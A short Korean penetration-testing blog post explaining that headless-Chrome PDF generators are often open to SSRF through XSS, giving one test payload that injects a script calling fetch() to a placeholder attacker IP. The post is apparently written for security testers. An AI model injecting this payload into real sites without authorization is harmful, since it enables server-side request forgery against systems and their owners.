annyoung

pdf generator SSRF 본문

모의해킹

pdf generator SSRF

nopsled 2023. 11. 28. 16:24

개인적으로 느끼는게 SSRF가 pdf generator에서 많이 발생하곤 한다.

 

chromedrvier에 의해 생성된 pdf 파일

 

pdf 파일을 vi나 xxd로 확인해보면 Chromium이거나, Skia/PDF인 경우 chromedriver에서 렌더링하기 때문에 XSS로 인해 SSRF가 많이 발생한다.

 

사이트 기능중에 pdf generator가 있다면 한번쯤 테스트 해보는걸 추천한다.

 

테스트 하는 방법은 다음과 같다.

<script>fetch('http://YOUR_IP/ping');</script>

 

pdf generator에서 필요한 값에 위처럼 입력하면 fetch로 공격자 서버에 요청보내게 되어 SSRF가 발생하는걸 볼 수 있다.

'모의해킹' 카테고리의 다른 글

클라이언트 프레임워크 디버깅 쉽게하기  (2) 2023.11.21
XSS 필터링 우회  (0) 2023.11.01
Cryptojs AES encrypt and decrypt  (0) 2023.02.23
XSS RCE  (0) 2023.01.30
source map 파일 강제 연동  (0) 2022.12.14
Comments